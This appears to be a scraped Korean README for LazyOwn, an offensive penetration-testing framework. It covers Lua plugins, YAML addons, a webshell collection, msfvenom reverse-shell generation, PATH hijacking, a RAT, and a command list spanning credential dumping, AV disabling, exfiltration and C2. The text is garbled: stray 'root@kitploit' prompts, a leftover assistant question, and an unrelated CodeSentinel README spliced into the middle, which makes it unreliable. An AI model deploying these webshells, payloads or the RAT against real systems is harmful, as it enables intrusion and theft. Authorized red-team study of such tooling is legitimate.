핵심 관리: `assign`, `show`, `doctor`, `wizard`, `scope`, `collab_join`, `config_banner`, `palette`, `fz`.

전체 606개 명령 참조는 [`COMMANDS.md`](https://github.com/grisuno/lazyown/blob/main/COMMANDS.md)를, 참여의 80%를 커버하는 18개 명령은 [`ESSENTIALS.md`](https://github.com/grisuno/lazyown/blob/main/ESSENTIALS.md)를 참조하세요.

# Lua 플러그인으로 LazyOwnShell 확장하기

이 문서는 Python의 `cmd2` 프레임워크 위에 구축된 `LazyOwnShell` 애플리케이션의 기능을 Lua 스크립팅을 사용하여 확장하는 방법을 설명합니다. Lua를 사용하면 새로운 명령을 추가하거나, 기존 동작을 수정하거나, 애플리케이션 데이터에 접근할 수 있는 사용자 정의 플러그인을 작성할 수 있습니다.

![image](https://assets.kitploit.com/production/public/readmes/56369/c299c50e76da30a39158e7121eb350b9c906048783727107fb9ca556c5317878/f2fa2be6395535c04e8fe7e5630c65d7112913560e76ea2c6a6e0144be148795-display-v1.webp)

---

## 목차

1. [소개](#introduction)
2. [Lua 플러그인 설정](#setting-up-lua-plugins)
3. [Lua 플러그인 작성](#writing-lua-plugins)
4. [새 명령 등록](#registering-new-commands)
5. [애플리케이션 데이터 접근](#accessing-application-data)
6. [오류 처리](#error-handling)
7. [예제 플러그인](#example-plugins)
8. [모범 사례](#best-practices)

---

## 1. 소개

`LazyOwnShell` 애플리케이션은 사용자가 핵심 Python 코드를 수정하지 않고도 기능을 확장할 수 있도록 Lua 스크립팅을 지원합니다. Lua 스크립트(플러그인)는 `plugins/` 디렉터리에 저장되며 애플리케이션이 시작될 때 자동으로 로드됩니다.

Lua 플러그인은 다음을 수행할 수 있습니다:
- 셸에 새로운 명령을 추가합니다.
- 기존 명령이나 동작을 수정합니다.
- Python에서 노출된 애플리케이션 데이터에 접근하고 조작합니다.

---

## 2. Lua 플러그인 설정

Lua 플러그인을 사용하려면 다음을 확인하세요:

1. Python 환경에 `lupa` 라이브러리를 설치합니다:   ```bash
   pip install lupa
root@kitploit:~
plugins/
     init_plugins.lua
     hello.lua
     goodbye.lua

애플리케이션이 시작되면 init_plugins.lua를 실행하며, 이는 plugins/ 디렉터리에 있는 다른 모든 .lua 파일을 로드합니다.

  1. Lua 플러그인 작성하기 Lua 플러그인은 plugins/ 디렉터리에 배치된 .lua 확장자를 가진 스크립트 파일입니다. 각 플러그인은 함수를 정의하고 이를 셸의 명령어로 등록할 수 있습니다.

Lua 플러그인의 구조 ```lua -- Define a function for the new command function my_command(arg) -- Your logic here print("This is a new command: " .. (arg or "default")) end

root@kitploit:~
-- Register the function as a command
register_command("my_command", my_command)
root@kitploit:~
Key Functions
- register_command(command_name, lua_function):
- 셸에 새 명령을 등록합니다.
- command_name: 명령의 이름 (예: hello).
- lua_function: 명령이 호출될 때 실행할 Lua 함수.

3. 새 명령 등록하기

 셸에 새 명령을 추가하려면 다음 단계를 따르세요:

- 명령 로직을 구현하는 Lua 함수를 정의합니다.
- register_command를 사용하여 함수를 명령으로 등록합니다.
- 예: hello 명령 추가하기
- 다음 내용으로 plugins/hello.lua 파일을 생성합니다:   ```lua
 function hello(arg)
     local name = arg or "world"
     print("Hello, " .. name .. "!")
 end

 register_command("hello", hello)

이제 셸에서 hello 명령을 실행할 수 있습니다: bash hello Lua Hello, Lua! 4. 모범 사례

  • 플러그인을 모듈식으로 유지 : 각 플러그인은 단일 기능이나 기능성에 집중해야 합니다.
  • 플러그인 문서화 : 사용 예제를 포함하여 각 플러그인에 대한 명확한 문서를 제공하세요.
  • 철저한 테스트 : 메인 애플리케이션에 통합하기 전에 플러그인을 독립적으로 테스트하세요.
  • 오류를 우아하게 처리 : Lua 플러그인에서 오류를 처리하고 충돌을 방지하기 위해 pcall을 사용하세요.

Lua 스크립팅을 활용하면 핵심 Python 코드를 수정하지 않고도 LazyOwnShell의 기능을 확장할 수 있습니다. 이를 통해 더 큰 유연성과 사용자 정의가 가능해지며, 사용자가 특정 요구 사항을 충족하기 위해 자체 플러그인을 작성할 수 있습니다. 즐거운 코딩 되세요!

LazyAddons YAML 시스템

YAML 파일을 사용하여 기능을 확장할 수 있는 LazyAddons 시스템 덕분에, 비프로그래머에게도 LazyOwn RedTeam Framework의 기능 확장이 그 어느 때보다 쉬워졌습니다.

YAML 구성 파일을 통한 선언적 명령 생성.

파일 구조

lazyaddons/ ├── addon1.yaml ├── addon2.yaml └── example.yaml

🛠️ 애드온 정의

최소 예제```yaml

name: "shortname" # CLI command (do_shortname) enabled: true description: "Tool description for help system"

tool: name: "Full Tool Name" repo_url: "https://github.com/user/repo" install_path: "tools/toolname" execute_command: "python tool.py -u {url}"

root@kitploit:~
고급 구성```yaml
params:
  - name: "url"
    required: true
    description: "Target URL"
    default: "http://localhost"

  - name: "threads"
    required: false
    default: 4

기능 자동 설치 누락된 경우 Git에서 도구를 복제합니다:```bash git clone <repo_url> <install_path>

root@kitploit:~
Parameter Substitution
명령의 {param}을 다음의 값으로 대체합니다:

- 명령 인수

- 기본값

- self.params

- 도움말 통합

help <command>는 YAML 설명을 표시합니다.

템플릿```yaml
name: ""
enabled: true
description: ""

tool:
  name: ""
  repo_url: ""
  install_path: ""
  install_command: ""  # Optional
  execute_command: ""

params:
  - name: ""
    required: true/false
    default: ""
    description: ""

▶️ 사용법 YAML 파일을 lazyaddons/에 배치하세요

CLI 애플리케이션을 시작하세요

등록된 명령을 실행하세요:```bash (Cmd) help your_command (Cmd) your_command -args

root@kitploit:~
🚨 문제 해결
필수 매개변수 누락: YAML의 필수 필드 확인

설치 실패: 네트워크/git 접근 확인

명령 오류: execute_command 구문 검증


주요 기능:
- 깔끔한 GitHub-flavored 마크다운
- YAML 애드온에만 집중
- 바로 사용 가능한 템플릿 포함
- 매개변수 치환 시스템 문서화
- 문제 해결 팁 제공

특정 예시나 사용 시나리오를 추가해 드릴까요?

![LazyOwnGris3](https://assets.kitploit.com/production/public/readmes/56369/e33455dad0ebc6b7279e64d6befcf165ce82ef5d21df552c9c6207e517842ac6/f44814861f7107d595f4c1c2f543f527ae55c37bbd3146414a6050250ef1c7e4-display-v1.webp)


Reddit의 LazyOwn

LazyOwn으로 펜테스팅 혁신: Linux, MAC OSX, Windows VICTIMS에 대한 침투 자동화

<https://www.reddit.com/r/LazyOwn/>


<https://github.com/grisuno/LazyOwn/assets/1097185/eec9dbcc-88cb-4e47-924d-6dce2d42f79a>

Linux, MacOSX, Windows 시스템을 공격하기 위한 펜테스팅 워크플로 자동화의 궁극적인 솔루션, LazyOwn을 만나보세요. 강력한 도구가 펜테스팅을 단순화하여 더 효율적이고 효과적으로 만들어 줍니다. 이 영상을 시청하여 LazyOwn이 보안 평가를 간소화하고 사이버보안 툴킷을 강화하는 방법을 알아보세요.```sh
LazyOwn> assign rhost 192.168.1.1
[SET] rhost set to 192.168.1.1
LazyOwn> run lazynmap
[INFO] Running Nmap scan on 192.168.1.1
...

LazyOwn은 펜테스팅 요구 사항을 위한 중앙 집중식 자동화 솔루션을 찾는 사이버 보안 전문가에게 이상적이며, 취약점을 식별하고 악용하는 데 시간을 절약하고 효율성을 향상시킵니다.

Captura de pantalla 2024-05-22 021136

요구 사항

  • Python 3.x

  • Python 모듈:

    • requests
    • python-libnmap
    • pwncat-cs
    • pwn
    • groq
    • PyPDF2
    • docx
    • python-docx
    • olefile
    • exifread
    • pycryptodome
    • impacket
    • pandas
    • colorama
    • tabulate
    • pyarrow
    • keyboard
    • flask-unsign
    • name-that-hash
    • certipy-ad
    • ast
    • pykeepass
    • cmd2
    • Pillow
    • netaddr
    • stix2
    • pyautogui
  • subprocess (Python 표준 라이브러리에 포함됨)

  • platform (Python 표준 라이브러리에 포함됨)

  • tkinter (GUI용 선택 사항)

  • numpy (GUI용 선택 사항)

설치

  1. 저장소를 클론합니다:```sh git clone https://github.com/grisuno/LazyOwn.git cd LazyOwn
root@kitploit:~
2. Python 종속성을 설치합니다:```sh
./install.sh

사용법

image```sh ./run or ./fast_run_as_r00t.sh

./run --help [;,;] LazyOwn vvvrelease/0.2.8 Usage: ./run [Options] Options: --help Show this help panel. -v Show version. -p <payloadN.json> Exec with different payload.json example. ./run -p payload1.json, (Special for RedTeams) -c Exec a command using LazyOwn example: ping --no-banner No Banner -s Run as root --old-banner Show old Banner

./fast_run_as_r00t.sh --vpn 1 (the number id of your file in vpn directory)

root@kitploit:~
## 주요 기능

- **다중 소스 수집**: GitHub, GitLab, 로컬 디렉터리, ZIP 아카이브, 단일 파일
- **지능형 분석**: 언어 감지, 프레임워크 식별, 의존성 추출
- **보안 스캐닝**: 시크릿 감지, 취약점 패턴, 안전하지 않은 구성
- **LLM 기반 인사이트**: AI 기반 코드 리뷰 및 아키텍처 분석
- **다중 형식 보고서**: Markdown, JSON, HTML, SARIF 출력
- **CI/CD 통합**: GitHub Actions, GitLab CI, Jenkins 지원
- **확장 가능한 아키텍처**: 플러그인 시스템 및 사용자 정의 분석기

## 설치

### 사전 요구 사항

- Python 3.9 이상
- Git (저장소 복제용)
- 선택 사항: LLM 기반 분석을 위한 OpenAI API 키

### pip 사용

```bash
pip install codesentinel

소스에서 설치

root@kitploit:~
git clone https://github.com/yourusername/codesentinel.git
cd codesentinel
pip install -e .

Docker 사용

root@kitploit:~
docker pull codesentinel/codesentinel:latest
docker run -v $(pwd):/workspace codesentinel/codesentinel analyze /workspace

빠른 시작

기본 사용법

root@kitploit:~
# 로컬 디렉터리 분석
codesentinel analyze /path/to/project

# GitHub 저장소 분석
codesentinel analyze https://github.com/user/repo

# 특정 출력 형식으로 분석
codesentinel analyze /path/to/project --format json --output report.json

# LLM 기반 분석 활성화
codesentinel analyze /path/to/project --llm --api-key $OPENAI_API_KEY

구성 파일

프로젝트 루트에 .codesentinel.yml 파일을 생성하세요:

root@kitploit:~
version: "1.0"

analysis:
  languages:
    - python
    - javascript
    - go
  exclude:
    - "**/node_modules/**"
    - "**/.git/**"
    - "**/vendor/**"
  max_file_size: 1048576  # 1MB

security:
  enabled: true
  checks:
    - secrets
    - vulnerabilities
    - misconfigurations
  severity_threshold: medium

llm:
  enabled: false
  provider: openai
  model: gpt-4
  max_tokens: 4096

output:
  format: markdown
  include_code_snippets: true
  include_recommendations: true

사용법

명령줄 인터페이스

root@kitploit:~
# 도움말 표시
codesentinel --help

# 사용 가능한 명령어 목록
codesentinel --version

# 특정 언어만 분석
codesentinel analyze /path/to/project --languages python,javascript

# 보안 스캔만 실행
codesentinel scan /path/to/project --checks secrets,vulnerabilities

# 두 저장소 비교
codesentinel compare /path/to/repo1 /path/to/repo2

# 대화형 모드 시작
codesentinel interactive

Python API

root@kitploit:~
from codesentinel import CodeSentinel

# 분석기 초기화
sentinel = CodeSentinel(
    llm_enabled=True,
    api_key="your-api-key"
)

# 프로젝트 분석
result = sentinel.analyze("/path/to/project")

# 결과 접근
print(f"발견된 문제: {len(result.issues)}")
print(f"코드 품질 점수: {result.quality_score}")

# 보고서 생성
result.export("report.md", format="markdown")
result.export("report.json", format="json")

GitHub Actions 통합

root@kitploit:~
name: CodeSentinel Analysis

on:
  push:
    branches: [main]
  pull_request:
    branches: [main]

jobs:
  analyze:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      
      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.11'
      
      - name: Install CodeSentinel
        run: pip install codesentinel
      
      - name: Run analysis
        run: codesentinel analyze . --format sarif --output results.sarif
      
      - name: Upload SARIF
        uses: github/codeql-action/upload-sarif@v2
        with:
          sarif_file: results.sarif

구성

전역 구성

~/.codesentinel/config.yml에 전역 구성을 생성하세요:

root@kitploit:~
defaults:
  output_format: markdown
  severity_threshold: low
  parallel_workers: 4

llm:
  provider: openai
  model: gpt-4
  temperature: 0.2

logging:
  level: info
  file: ~/.codesentinel/codesentinel.log

환경 변수

root@kitploit:~
export CODESENTINEL_API_KEY="your-api-key"
export CODESENTINEL_LLM_PROVIDER="openai"
export CODESENTINEL_LOG_LEVEL="debug"
export CODESENTINEL_CONFIG_PATH="/custom/path/config.yml"

분석기

내장 분석기

분석기설명언어
secrets하드코딩된 시크릿 및 자격 증명 감지모두
vulnerabilities알려진 취약점 패턴 스캔Python, JS, Go, Java
dependencies의존성 및 라이선스 분석모두
complexity순환 복잡도 및 유지보수성Python, JS, Go
architecture아키텍처 패턴 및 안티패턴모두
documentation문서 완전성 검사모두

사용자 정의 분석기

root@kitploit:~
from codesentinel.analyzers import BaseAnalyzer

class CustomAnalyzer(BaseAnalyzer):
    name = "custom"
    description = "My custom analyzer"
    
    def analyze(self, context):
        issues = []
        # 사용자 정의 분석 로직
        return issues

# 분석기 등록
sentinel.register_analyzer(CustomAnalyzer())

출력 형식

Markdown 보고서

root@kitploit:~
# CodeSentinel 분석 보고서

## 요약
- **파일**: 42
- **코드 줄 수**: 15,234
- **문제**: 7
- **품질 점수**: 85/100

## 보안 문제

### 높음: 하드코딩된 API 키
**파일**: `src/config.py:23`
**설명**: 소스 코드에 API 키가 하드코딩되어 있습니다.
**권장 사항**: 환경 변수 또는 시크릿 관리자 사용

JSON 출력

root@kitploit:~
{
  "summary": {
    "files": 42,
    "lines": 15234,
    "issues": 7,
    "quality_score": 85
  },
  "issues": [
    {
      "severity": "high",
      "type": "secret",
      "file": "src/config.py",
      "line": 23,
      "message": "Hardcoded API key detected"
    }
  ]
}

SARIF 출력

root@kitploit:~
{
  "$schema": "https://json.schemastore.org/sarif-2.1.0.json",
  "version": "2.1.0",
  "runs": [
    {
      "tool": {
        "driver": {
          "name": "CodeSentinel",
          "version": "1.0.0"
        }
      },
      "results": []
    }
  ]
}

고급 기능

LLM 기반 분석

root@kitploit:~
# OpenAI로 LLM 분석 활성화
codesentinel analyze /path/to/project \
  --llm \
  --provider openai \
  --model gpt-4 \
  --api-key $OPENAI_API_KEY

# 로컬 LLM 사용 (Ollama)
codesentinel analyze /path/to/project \
  --llm \
  --provider ollama \
  --model codellama \
  --endpoint http://localhost:11434

사용자 정의 규칙

.codesentinel/rules/에 사용자 정의 규칙을 생성하세요:

root@kitploit:~
# .codesentinel/rules/custom-rules.yml
rules:
  - id: CUSTOM001
    name: "금지된 함수 사용"
    description: "eval() 함수는 사용하지 마세요"
    severity: high
    pattern: "eval\\("
    languages: [python, javascript]
    message: "eval() 사용은 보안 위험을 초래합니다"
    remediation: "안전한 대안을 사용하세요"

플러그인 시스템

root@kitploit:~
from codesentinel.plugins import Plugin

class MyPlugin(Plugin):
    name = "my-plugin"
    version = "1.0.0"
    
    def on_analysis_start(self, context):
        print("분석 시작 중...")
    
    def on_analysis_complete(self, result):
        print(f"분석 완료: {len(result.issues)}개 문제")
    
    def on_issue_found(self, issue):
        # 사용자 정의 처리
        pass

# 플러그인 등록
sentinel.register_plugin(MyPlugin())

문제 해결

일반적인 문제

문제: ModuleNotFoundError: No module named 'codesentinel'

해결 방법:

root@kitploit:~
pip install --upgrade codesentinel
# 또는
pip install -e .

문제: LLM 분석 시간 초과

해결 방법:

root@kitploit:~
# 시간 초과 증가
codesentinel analyze /path/to/project --llm --timeout 300

# 또는 더 작은 모델 사용
codesentinel analyze /path/to/project --llm --model gpt-3.5-turbo

문제: 대규모 저장소에서 메모리 부족

해결 방법:

root@kitploit:~
# 병렬 워커 감소
codesentinel analyze /path/to/project --workers 2

# 파일 크기 제한 설정
codesentinel analyze /path/to/project --max-file-size 512000

디버그 모드

root@kitploit:~
# 상세 로깅 활성화
codesentinel analyze /path/to/project --verbose --log-level debug

# 로그를 파일로 저장
codesentinel analyze /path/to/project --log-file debug.log

기여

기여를 환영합니다! 자세한 내용은 CONTRIBUTING.md를 참조하세요.

개발 환경 설정

root@kitploit:~
# 저장소 복제
git clone https://github.com/yourusername/codesentinel.git
cd codesentinel

# 가상 환경 생성
python -m venv venv
source venv/bin/activate  # Windows: venv\Scripts\activate

# 개발 의존성 설치
pip install -e ".[dev]"

# 테스트 실행
pytest tests/

# 린터 실행
ruff check .
mypy codesentinel/

라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.

감사의 글

  • OpenAI - LLM 기능 제공
  • Tree-sitter - 구문 분석
  • Rich - 터미널 출력
  • 모든 기여자 및 유지관리자

지원

  • 📖 문서
  • 💬 토론
  • 🐛 이슈 트래커
  • 📧 이메일 지원

CodeSentinel - 코드를 자신 있게 보호하세요 🔒``` Use assign to configure parameters. Use show to display the current parameter values. Use run <script_name> to execute a script with the set parameters. Use exit to exit the CLI.

Once the shell is running, you can use the following commands:

list: Lists all LazyOwn Modules. assign : Sets the value of a parameter. For example, assign rhost 192.168.1.1. show: Displays the current values of all parameters. run

┌─[👤grisun0 (LazyOwn👽kali) ~/home/grisun0/LazyOwn][127.0.0.1][http://VariaType.htb] 🌐192.168.1.120 ✗ feature/lazyllmchat-assistant (🐍env) └╼ $ help

  1. Reconnaissance ────────────────── alterx finalrecon ping trace
    apache_users getcap ports trufflehog
    binarycheck gospider proxy tshark_analyze
    cve graudit recon waybackmachine
    dig httprobe serveralive2 whatweb
    dnschef ipinfo sherlock windapsearchscrapeusers dnsenum launchpad sslscan
    dnsmap metabigor tcpdump_capture dnstool_py openssl_sclient tcpdump_icmp

  2. Scanning & Enumeration ────────────────────────── ad_ldap_enum enum4linux_ng nbtscan rpcdump wpscan allin evil_ssdp net_rpc_addmem rpcmap_py
    amass feroxbuster netexec samrdump
    arjun finger_user_enum netview sawks
    arpscan fuzz nikto sessionssh
    batchnmap getnpusers nmapscript skipfish
    bbot gobuster nuclei smbattack
    blazy hound odat smbclient
    bloodhound kerbrute openredirex smbclient_impacket breacher lazynmap osmedeus smbclient_py
    certipy ldapdomaindump parsero smbmap
    certipy_ad ldapsearch parth smtpuserenum
    changeme lookupsid portdiscover snmpcheck
    cme lookupsid_py portservicediscover snmpwalk
    davtest loxs pre2k swaks
    dirsearch lynis pykerbrute vscan
    dmitry magicrecon rdp_check_py wfuzz
    enum4linux mqtt_check_py rpcclient windapsearch

  3. Exploitation ──────────────── aclpwn_py gettgtpkinit_py psexec sqlmap
    addspn_py greatSCT psexec_py sqsh
    autoblody img2cookie py3ttyup ss
    cacti_exploit jwt_tool pyautomate sshexploit
    commix krbrelayx_py pyoracle2 template_helper_serializer cp kusa pywhisker ticketer
    createcookie lazypwn rejetto_hfs_exec unicode_WAFbypass
    createdll lfi rev upload_bypass
    digdug lol seo utf
    download_exploit ms08_067_netapi sharpshooter winbase64payload
    downloader ntpdate shellfire wrapper
    eternal owneredit shellshock www
    excelntdonut padbuster sireprat xss
    filtering powerserver sqli xsstrike
    gets4uticket_py printerbug_py sqli_mssql_test

  4. Post-Exploitation ───────────────────── add2find exe2bin pezorsh
    adversary exe2donutbin pip_proxy
    adversary_yaml extract_yaml pip_repo
    aes_pe find powershell_cmd_stager ai_playbook follina rmfromfind
    apt_proxy hex2shellcode rubeus
    apt_repo internet_proxy scavenger
    atomic_lazyown issue_command_to_c2 scp
    bin2shellcode lazywebshell service_ssh
    convert_remcomsvc_from_file mimikatzpy sessionsshstrace
    cports msfshellcoder shellcode
    create_synthetic ofuscate_string shellcode2elf
    createpayload ofuscatesh shellcode2sylk
    d3monizedshell ofuscatorps1 shellcode_search
    disableav path2hex ssh_cmd

  5. Persistence ─────────────── asprevbase64 ftp msfpc setoolKits backdoor_factory generate_revshell paranoid_meterpreter ssh
    conptyshell grisun0 pwncat toctoc
    createrevshell grisun0w pwncatcs veil
    createwebshell ivy rdp weevely
    createwinrevshell knokknok revwin weevelygen darkarmour listener_go scarecrow
    dr0p1t listener_py service

  6. Privilege Escalation ──────────────────────── responder smbserver

  7. Credential Access ───────────────────── addusers cred john2hash rocky
    adsso_spray creds_py john2keepas searchhash
    cewl crunch john2zip smalldic
    crack_cisco_7_password cubespraying keepass spraykatz
    createcredentials dacledit medusa sshkey
    createhash generatedic passtightvnc sudo
    createmail hashcat passwordspray transform
    createusers_and_hashs hydra refill_password username_anarchy

  8. Lateral Movement ──────────────────── addcli id_rsa penelope sshd wifipass
    bloodyAD lateral_mov_lin regeorg stormbreaker wmiexec
    chisel ligolo rnc targetedKerberoas wmiexecpro dcomexec mssqlcli set_proxychains tord
    getTGT nc shadowsocks upload_c2
    gospherus ngrok socat vpn

  9. Data Exfiltration ───────────────────── adgetpass dploot evilwinrm getuserspns reg_py secretsdump
    decrypt encrypt getadusers gitdumper rsync unzip
    download_c2 evidence getnthash_py gmsadumper samdump2 upload_gofile

  10. Command & Control ───────────────────── atomic_agent automsf emp3r0r mitre_test sliver_server atomic_gen c2 empire msf
    atomic_tests caldera generate_playbook msfrpc
    attack_plan duckyspark iis_webdav_upload_asp my_playbook

  11. Reporting ───────────── apropos createtargets gpt process_scans banners download_malwarebazar groq pth_net
    c2asm extract_ports img2vid pup
    camphish eyewitness malwarebazar vulns
    create_session_json eyewitness_py morse
    createjsonmachine get_avaible_actions name_the_hash createjsonmachine_batch gowitness nmapscripthelp

  12. Miscellaneous ───────────────── acknowledgearp clone_site getseclist links run
    acknowledgeicmp cron graph list sh
    addhosts decode h load_session show
    aliass download_resources hex_to_plaintext nano sys
    assign encode ignorearp news tab
    banner encoderpayload ignoreicmp payload urldecode base64decode encodewinbase64 ip pwd urlencode base64encode exit ip2asn qa v
    check_update fixel ip2hex rhost
    clean fixperm kick rot
    clock gencert lazyscript rotf

  13. Lua Plugin ────────────── generate_c_reverse_shell lolbas_certutil_download_exec generate_cleanup_commands lolbas_certutil_exe
    generate_html_payload lolbas_mshta_js
    generate_lateral_command lolbas_mshta_reverse_shell
    generate_linux_asm_reverse_shell lolbas_rundll32_dll
    generate_linux_raw_shellcode lolbas_wmic_xsl_execution
    generate_lolbird parse_nmap_with_xmlstarlet
    generate_msfvenom_loader run_nuclei_on_nmap_files
    generate_msfvenom_loader_windows run_python_rev_c2
    generate_reverse_shell rundll32_sct_from_url
    generate_stub validate_shellcode
    kerberos_harvest visualize_network
    lolbas_bitsadmin_exe

  14. Yaml Addon. ─────────────── AdaptixC2 GoPEInjection OverRide agentzero gosearch peeko argfuscator gui pretender ATTPwn gui2 PTMultiTools AuroraPatch hack_browser_data PTMultiTools_scan banner_tool hellbird PyinMemoryPE bbr hive pyrit beacon hooka_linux_amd64 raven blacksandbeacon hostdiscover ridenum blacksandbeacon_bof kivi_revshell setoolkit cgoblin_windows laps ShadowLink Clematis lazyaddon_creator shellcode_custom_win_rev_tcp_xored commix2 lazyagentAi SigPloit copy-fail-CVE-2026-31431 lazybinenc spoonmap CVE-2022-22077 lazyftpsniff stratus_detonate CVE_2025_24071_PoC LazyLoader stratus_list demiguise lazymapd toposwarm ebird3 lazyownbt unicorn evilginx2 LazyOwnExplorer upxdump gcr llm vulnbot gemini-cli NullGate vulnbot_groq gen_dll_rev oniux vulnhuntr Get_ReverseShell opencode_adapter watchguard githubot orpheus wspcoerce gomulti_loader_linux gomulti_loader_windows

  15. Adversary YAML. ─────────────────── amsi_c implant_nim_nim infect_c pid_c
    implant_crypt_go implant_rust_rs persist_ps1 shell_c

  16. Artificial Intelligence ─────────────────────────── ai_toggle

Uncategorized Commands ────────────────────── addalias gobuster_dns ipy ollama_enum set
alias gobuster_http listaliases pop shell
edit gobuster_web macro quit shortcuts
EOF help nikto_host rrhost subwfuzz_tool ffuf_enumeration history notify run_pyscript ffuf_tool ipp nuclei_ad_http run_script

┌─[👤grisun0 (LazyOwn👽kali) ~/home/grisun0/LazyOwn][127.0.0.1][http://VariaType.htb] 🌐192.168.1.120 ✗ feature/lazyllmchat-assistant (🐍env) └╼ $

root@kitploit:~
## YouTube 태그
<https://www.youtube.com/hashtag/lazyown>

## 팟캐스트
<https://www.youtube.com/watch?v=m4FtlhownvM&list=PLW9Qe5HJK5CFXyIsF9b0NB6n9EY8Am3YZ>

## DeepWiki
<https://deepwiki.com/grisuno/LazyOwn/>```sh
LazyOwn> assign binary_name my_binary
LazyOwn> assign rhost 192.168.1.100
LazyOwn> assign api_key my_api_key
LazyOwn> run lazysearch
LazyOwn> run lazynmap
LazyOwn> exit

image

GTFOBins에서 얻은 스크래핑된 데이터베이스 내에서 검색하기 위한 것입니다.```sh python3 lazysearch.py binario_a_buscar

root@kitploit:~
## GUI를 사용한 검색
추가 기능 및 개선 사항:
AutocompleteEntry:

자동 완성 목록에서 None 값을 제거하는 필터가 추가되었습니다.
새로운 공격 벡터:

메인 인터페이스에 "새로운 공격 벡터" 버튼이 추가되었습니다.
새로운 공격 벡터를 추가하고 업데이트된 데이터를 Parquet 파일에 저장하는 기능이 구현되었습니다.
CSV로 내보내기:

메인 인터페이스에 "CSV로 내보내기" 버튼이 추가되었습니다.
DataFrame 데이터를 사용자가 선택한 CSV 파일로 내보내는 기능이 구현되었습니다.
사용법:

새로운 공격 벡터 추가: "새로운 공격 벡터" 버튼을 클릭하고, 필드를 입력한 후 저장합니다.
CSV로 내보내기: "CSV로 내보내기" 버튼을 클릭하고 CSV 파일을 저장할 위치를 선택합니다.
새로운 함수 scan_system_for_binaries:

file 명령을 사용하여 파일이 바이너리인지 확인하는 시스템 전체 바이너리 검색을 구현합니다.
os.walk를 사용하여 파일 시스템을 순회합니다.
결과는 GUI 내의 새 창에 표시됩니다.
바이너리 검색 버튼:

메인 인터페이스에 "시스템에서 바이너리 검색" 버튼이 추가되었으며, 이 버튼은 scan_system_for_binaries 함수를 호출합니다.
참고:

is_binary 함수는 Unix file 명령을 사용하여 파일이 바이너리 실행 파일인지 확인합니다. 다른 운영 체제를 사용하는 경우 호환성을 위해 이 방법을 조정해야 합니다.
이 구현은 전체 파일 시스템을 순회하므로 리소스를 많이 사용할 수 있습니다. 특정 디렉터리로 검색을 제한하거나 특정 파일 유형을 필터링하는 추가 옵션을 추가하는 것을 고려할 수 있습니다.```sh
python3 LazyOwnExplorer.py

image```sh python3 lazyown.py

root@kitploit:~
업데이트하려면 다음과 같이 진행합니다:```sh
cd LazyOwn
rm parquets/*.csv
rm parquets/*.parquet
./update_db.sh

LazyOwn WebShells 모드 사용

LazyOwn Webshell Collection은 우리 프레임워크를 위한 웹셸 모음으로, LazyOwn을 실행하는 머신에서 다양한 프로그래밍 언어를 사용하여 웹셸을 구축할 수 있게 해줍니다. 본질적으로 LazyOwn Webshell은 modules 디렉터리 내에 웹 서버를 띄워 웹 브라우저를 통해 접근할 수 있도록 합니다. 이를 통해 모듈을 웹을 통해 개별적으로 사용할 수 있을 뿐만 아니라 cgi-bin 디렉터리에 접근할 수 있으며, 여기에는 네 개의 셸이 있습니다: Bash 하나, Perl 하나, Python 하나, 그리고 대상이 Windows 머신일 경우를 위한 ASP 하나입니다.```sh lazywebshell

root@kitploit:~
y listo ya podemos acceder a cualquiera de estas url:

<http://localhost:8080/cgi-bin/lazywebshell.sh>

<http://localhost:8080/cgi-bin/lazywebshell.py>

<http://localhost:8080/cgi-bin/lazywebshell.asp>

<http://localhost:8080/cgi-bin/lazywebshell.cgi>

![image](https://assets.kitploit.com/production/public/readmes/56369/46d7b61ebc8f339f9ddf47b4587e3a3b2e658653754abe25a57d499da42bb54f/810e9f2ec3bc35e4f4a8fb64f8108a85c581bd0448d21b2cb2956b7c5b4814be-display-v1.webp)

## Lazy MSFVenom을 사용한 리버스 셸

    사용자 입력을 기반으로 다양한 페이로드를 생성하기 위해 `msfvenom` 도구를 실행합니다.

    이 함수는 사용자에게 미리 정의된 목록에서 페이로드 유형을 선택하라는 메시지를 표시하고, 원하는 페이로드를 생성하기 위해
    해당 `msfvenom` 명령을 실행합니다. Linux, Windows, macOS, Android 시스템용 다양한 유형의
    페이로드 생성과 C 페이로드에 대한 Shikata Ga Nai를 사용한 선택적 인코딩 등의 작업을 처리합니다.

    생성된 페이로드는 `sessions` 디렉터리로 이동되며, 여기서 적절한 권한이 설정됩니다. 또한
    페이로드는 공간 효율성을 위해 UPX를 사용하여 압축할 수 있습니다. 선택한 페이로드가 Android APK인 경우,
    이 함수는 APK에 서명하고 필요한 후처리 단계를 수행합니다.

    :param line: 스크립트의 명령줄 인수.
    :return: None```sh
run lazymsfvenom or venom

명령 및 제어 시스템

명령 및 제어(C2) 시스템은 암호화된 통신을 사용하는 서버-클라이언트 아키텍처를 통해 원격 작업을 가능하게 합니다.

image

Lazy PATH 하이재킹 사용

페이로드에 설정된 binary_name이라는 이름의 파일이 /tmp에 생성되며, 메모리에서 gzip으로 초기화되고, 페이로드에서 bash를 사용합니다. JSON에서 페이로드를 설정하려면 payload 명령을 사용하여 실행하십시오. 사용법:```sh lazypathhijacking

root@kitploit:~
## LazyOwn RAT 사용 모드

![image](https://assets.kitploit.com/production/public/readmes/56369/9402abc4a6c873096e3c6017e35f56d0f3c5f5c66cb15a8b4bc9b8a8d54385f7/c3430588984c7ec596fff9b5d7553c0dd773ee29fa26558af681f93cf5433de4-display-v1.webp)


LazyOwn RAT는 단순하지만 강력한 원격 관리 도구입니다. 서버의 화면을 캡처하는 스크린샷 기능, 감염된 머신에 파일을 업로드할 수 있는 업로드 명령, 그리고 서버로 명령을 보낼 수 있는 C&C 모드를 갖추고 있습니다. 클라이언트 모드와 서버 모드, 두 가지 모드로 동작합니다. 난독화는 적용되지 않았으며, 이 RAT는 BasicRat을 기반으로 합니다. GitHub에서 https://github.com/awesome-security/basicRAT 와 https://github.com/hash3liZer/SillyRAT 에서 찾을 수 있습니다. 후자가 훨씬 더 포괄적이지만, 저는 단지 스크린샷 캡처, 파일 업로드, 명령 전송 기능만 구현하고 싶었습니다. 아마도 향후에 웹캠 보기 기능을 추가할 수도 있지만, 그건 나중의 일입니다.```sh
usage: lazyownserver.py [-h] [--host HOST] [--port PORT] --key KEY
lazyownserver.py: error: the following arguments are required: --key

usage: lazyownclient.py [-h] --host HOST --port PORT --key KEY
